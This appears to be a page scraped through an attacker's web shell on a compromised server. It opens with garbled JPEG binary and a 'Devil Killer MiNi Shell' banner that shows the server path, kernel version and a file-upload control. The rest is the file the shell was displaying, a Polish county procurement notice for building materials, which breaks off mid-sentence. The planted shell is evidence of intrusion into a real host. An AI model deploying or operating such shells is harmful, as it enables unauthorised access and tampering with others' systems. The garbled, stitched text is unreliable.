JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200904/581700-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 581700-N-2020 z dnia 2020-09-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Głubczycki</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Sukcesywna dostawa materiałów budowlanych dla Domu Pomocy Społecznej w Klisinie Filia w Branicach w ramach zadania : "Zmniejszenie zużycia energii w Domu Pomocy Społecznej w Klisinie Filia w Branicach poprzez kompleksową termomodernizację, wymianę oświetlenia i montaż pompy ciepła"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"> </span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Głubczycki</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">53141246700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Kochanowskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">15</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">48-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Głubczyce</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">opolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">77 4852078, 4053660</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">starostwo@powiatglubczycki.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">774 856 533</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.powiatglubczycki.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.powiatglubczycki.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.powiatglubczycki.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pisemnie na adres wskazany poniżej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Powiat Głubczycki ul. Kochanowskiego 15 48-100 Głubczyce Polska</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Sukcesywna dostawa materiałów budowlanych dla Domu Pomocy Społecznej w Klisinie Filia w Branicach w ramach zadania : "Zmniejszenie zużycia energii w Domu Pomocy Społecznej w Klisinie Filia w Branicach poprzez kompleksową termomodernizację, wymianę oświetlenia i montaż pompy ciepła"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">OR.272..7.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">tylko jednej części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Sukcesywna dostawa materiałów budowlanych dla Domu Pomocy Społecznej w Klisinie Filia w Branicach w ramach zadania : "Zmniejszenie zużycia energii w Domu Pomocy Społecznej w Klisinie Filia w Branicach poprzez kompleksową termomodernizację, wymianę oświetlenia i montaż pompy ciepła"L.p	Nazwa	Jedn. miary	Ilość1. Płyta rezolowa ze sztywnej piani rezolowej zespolona z płytą kartonowo-gipsową do wewnątrz o lambdzie 0,021 i grubość 90 mm + 12,5 mm współczynnik przewodzenia ciepła [W/(mK)] ?D = 0,021, gęstość min. - 35 [kg/m?], odporność na ściskanie (przy 10% odkształcenia)- ?100 kPa, nasiąkliwość - >90% cel zamkniętych, płyta ze zintegrowaną płytą gips-kartonową, w jednostronnej okładzinie z białego welonu szklanego.	m?	13002. Zaprawa klejowa poliuretanowa do płyt rezolowych-współczynnik przewodności cieplnej - 0,040 W/mK, -przyczepność :* do betonu ? 0,3 Mpa,* do styropianu ? 0,15 Mpa (rozerwanie w warstwie styropianu),* do cegły ceramicznej ? 0,30 Mpa,* do betonu komórkowego ? 0,15 Mpa,* do styropianu XPS ? 0,20 Mpa,	kg	365 3. Płyta rezolowa ze sztywnej piani rezolowej zespolona z płytą kartonowo-gipsową do wewnątrz o lambdzie 0,021 i grubość 20 mm + 12,5 mm współczynnik przewodzenia ciepła [W/(mK)] ?D = 0,021, gęstość min. - 35 [kg/m?], odporność na ściskanie (przy 10% odkształcenia)- ?100 kPa, nasiąkliwość - >90% cel zamkniętych, płyta ze zintegrowaną płytą gips-kartonową, w jednostronnej okładzinie z białego welonu szklanego.	m?	2704. Parapet konglomerat grubość 2 cmKolor i wzór do ustalenia z Zamawiającym	m?	505. Styropapa 10cm	m?	1086. Impregnat grzybobójczy Preparat do zwalczania grzybów pleśniowych oraz zielonych nalotów, paroprzepuszczalny. Wysoka skuteczność. Nie powodujący zagrożenia dla ludzi i środowiska. Używany wewnątrz i na zewnątrz budynków na podłożach takich jak: powłoki malarskie, tynki, beton itp. Preparat nie powodujący zabrudzeń, nie zawierający metali ciężkich. Baza: roztwór biocydów organicznych. Proporcje mieszania koncentratu: od 2 do 4 l wody na 1 l preparatu. Czas schnięcia: ok. 4 godz. Wyrób musi posiadać atest Państwowego Zakładu Higieny oraz pozwolenie na obrót produktem biobójczym.	l	487. Preparat wzmacniający Preparat wzmacniający gruntGrunt głęboko penetrujący służy do powierzchniowego wzmacniania wszelkich nasiąkliwych podłoży. Właściwości:- wzmacnia powierzchniowo podłoże- zmniejsza nasiąkliwość podłoża- poprawia przyczepność do podłoża- paroprzepuszczalny- ułatwia nanoszenie kolejnych warstw np. klejów, szpachlówek, posadzek, farb. Preparat służy do gruntowania podłoży (ścian, podłóg, sufitów) wewnątrz i na zewnątrz budynków przed mocowaniem płytek ceramicznych, wylewaniem posadzek, mocowaniem wykładzin podłogowych, tapetowaniem, szpachlowaniem, malowaniem czy mocowaniem płyt izolacji termicznej	l	668. Listwa cokołowa szer. 2cm	m	199. Masa uszczelniająca (np. SikaBond)Do wykonywania izolacji przeciwwilgociowych i wodochronnych.Szybkie wiązanie; redukuje hałas i odgłos kroków; wysoka przyczepność do różnych podłoży (także do starych płytek); trwale odporny na działanie wody, mrozu i wysokich temperatur, 1?składnikowy poliuretan wiążący pod wpływem wilgoci	kg	60010. Kątownik aluminiowy z siatką m	7011. Farba gruntującaFarba zwiększa przyczepność do podłoża, wodoodporna, gotowa do użycia. Ułatwia nakładanie cienkowarstwowych tynków oraz "przecierek" stosowanych na zewnątrz i wewnątrz budynków. Farba do gruntowania warstwy zbrojonej siatką przy ocieplaniu budynków metodą lekką-mokrą w systemach ociepleń oraz do tradycyjnych tynków. Farba do pokrywania powierzchni płyt wiórowych, gipsowo-kartonowych, tynków gipsowych, wszelkich betonów i mocnych powłok malarskich. Zwiększa przyczepność tynków, szpachlówek i farb. Zapobiega powstawaniu plam na kolorowych tynkach akrylowych, mineralnych i silikonowych. Baza: wodna dyspersja żywic syntetycznych z wypełniaczami mineralnymi. Gęstość: ok. 1,5 kg/dm3 . Temperatura stosowania: od +5°C do +25°CCzas schnięcia: ok. 3 godz. Zużycie: od 0,2 do 0,5 l/m2 w zależności od równości i nasiąkliwości podłoża	l.	4512. Klej do płytek Elastyczna zaprawa klejowa przeznaczona do mocowania płytek ceramicznych (glazura, terakota, gres), cementowych i kamiennych na podłożach odkształcalnych (beton, jastrychy i tynki cementowe, cementowo wapienne, beton komórkowy) i nieodkształcalnych zarówno wewnątrz, jak i na zewnątrz budynku.Wysoka przyczepność i elastyczność (klasa S1), stabilność na powierzchniach pionowych (brak spływu). Dane techniczne:- Baza: mieszanka cementów z wypełniaczami mineralnymi i modyfikatorami- Temperatura stosowania: od +5°C do +25°C. Odporność na temperaturę: od -30°C do +70°C.	kg	200013. Tynk z gipsu szpachlowego	kg	400014. Farby emulsyjne (kolor do uzgodnienia z zamawiającym)	l.	57615. Folia polietylenowa	m?	1233 16. Płyty kartonowo gipsowe ognioochronna gr 12,5 mm	m?	117717. Profil do płyt karton gips cd 60*27	m	213018. Profil przyścienny 28/27 do płyt gipsowych	m	45019. Łącznik wzdłużny lw 60/110	szt	42620. Łącznik krzyżowy lk 60/60	szt	170421. Blachowkręty typ 212/25	szt	2073422. Taśma do łączenia płyt karton (flizelinowa)	m	112123. Wełna mineralna skalna płyty 20 cm współczynnik przewodzenia ciepła [W/(mK)]?D = 0,035, gęstość - 45[kg/m?],klasa reakcji na ogień - A1	m?	112124. Gips - mieszanka tynkarska (np. uniflot)	kg	220025. Styropian podłogowy twardy gr 5 cm	m?	30026. Odpływ liniowy 90	szt	527. Pianka montażowa 750ml	szt	1028. Fuga łazienkowa elastyczna kolor do ustalenia z Zamawiającym	kg	5029. Zaprawa tynkarska	kg	60030. Papa termozgrzewalna dwuwarstwowaminimalna grubość 5,2 mm	m2	10831. Płytka posadzkowa łazienkowa gat/klasa I, wym. 30x30antypoślizgowa R11, odporność na ścieranie min IV, mrozoodpornaKolor i wzór do uzgodnienia z Zamawiającym	m2	8032. Płytka ścienna łazienkowa szkliwiona gat/klasa I, wymiar np. 25x40, grubość płytki 5-8mm, kolor i wzór do uzgodnienia z Zamawiającym	m2	15033. Rura kanalizacyjna pcv 110	mb	10034. Rura kanalizacyjna pcv 160	mb	3035. Żarówki LED 13W E27Średnia trwałość znamionowa min. 15000 h, klasa energetyczna min. A+, strumień świetlny 1521 lm, kształt bańki standardowy, barwa biała ciepła	szt	1136. Żarówki LED 6W E27Średnia trwałość znamionowa min. 15000 h, klasa energetyczna min. A, strumień świetlny 470 lm, kształt bańki standardowy, barwa biała ciepła	szt	7337. Żarówki LED 10W E27Średnia trwałość znamionowa min. 15000 h, klasa energetyczna min. A, strumień świetlny 1055 lm, kształt bańki standardowy, barwa biała ciepła	szt	15938. Wyłącznik główny WG - rozłącznik 160A w obudowie izolacyjnej -schemat w załączeniu	szt	139. Tablica bezpiecznikowa TG zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 550x750x200 - 1szt,-rozłącznik DPX I160A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn ventil - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	140. Tablica bezpiecznikowa T1 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły - 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	141. Tablica bezpiecznikowa T2 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły - 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	142. Tablica bezpiecznikowa T3 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły - 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	143. Tablica bezpiecznikowa T4 zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 4x24 moduły - 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	144. Tablica bezpiecznikowa TA zbudowana z :-obudowa wnękowa z drzwiczkami metalowymi rozmiaru 3x18 - 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt 145. Tablica bezpiecznikowa TK zbudowana z : -obudowa wnękowa z drzwiczkami metalowymi rozmiaru 2x18 - 1szt,-rozłącznik FR103-63A- 1szt.,-lampki sygnalizacyjne L300- 3szt.,-ochronnik przeciwprzepięciowy Dehn quard - 1kpl.- wyłącznik nadmiarowoschemat w załączeniu	szt	146. Rury winidurowe śr. 47 mm m	3947. Przewody izolowane jednożyłowe o przekroju żyły 35mm? wciągane do rur, LgY50	m	9648. Przewody kabelkowe o łącznym przekroju żył do Cu-24/Al.-40 mm?YDY5x10	m	10749. Przewody kabelkowe o łącznym przekroju żył do Cu-24/Al.-40 mm?YDY5x6	m	2250. Przewody kabelkowe o łącznym przekroju żył do Cu-24/Al.-40 mm?YDY5x4	m	5851. Przewody kabelkowe o łącznym przekroju żył do Cu-12/Al.-20 mm?YDY5x2,5	m	3052. Przewody kabelkowe o łącznym przekroju żył do 7,5 mm?YDY2x1,5	m	9053. Przewody instalacji RTV	m	92354. Gniazdo wtyczkowe RTV	szt	4555. Antena telewizyjna zbiorcza	szt	156. Wentylator łazienkowy kanałowy. Wentylator załączany razem z oświetleniem, wentylator z opóźnieniem wyłączenia	szt	161.Przedmiot zamówienia będzie realizowany sukcesywnie w asortymencie i ilościach wynikających z zapotrzebowań składanych bezpośrednio przez Zamawiającego.2. Podane w ofercie ceny będą stałe przez okres trwania umowy z zastrzeżeniem zmiany stawek podatku VAT na podstawie obowiązujących przepisów prawnych w tym zakresie. Zmianie ulegnie kwota podatku VAT, a co za tym idzie cena brutto, natomiast cena netto pozostanie niezmieniona.3. Podana szacunkowa ilość zapotrzebowania na materiały w SIWZ oraz w formularzu ofertowym nie jest ilością stałą, może być zwiększana lub zmniejszana według potrzeb Zamawiającego. 4. Zamawiający może jednostronnie zwiększyć wielkość przedmiotu zamówienia maksymalnie o 30% ogólnej wartości oferty netto Wykonawcy (jeżeli występują pakiety dotyczy to każdego z nich osobno). Z tego względu Wykonawcy nie przysługują wobec Zmawiającego jakiekolwiek roszczenia, w tym odszkodowawcze.5. Zamawiający określa minimalną wielkość przedmiotu zamówienia jaka zostanie zrealizowana na poziomie 30% ogólnej wartości oferty netto Wykonawcy (jeżeli występują pakiety dotyczy to każdego z nich osobno). Z tego względu Wykonawcy nie przysługują wobec Zmawiającego jakiekolwiek roszczenia, w tym odszkodowawcze.6. Zamawiający zastrzega sobie możliwość zwiększania lub zmniejszania ilości zamawianych materiałów w poszczególnych pozycjach oferty Wykonawcy. Z tytułu zwiększania lub zmniejszania ilości zamawianych materiałów Wykonawcy nie przysługuje 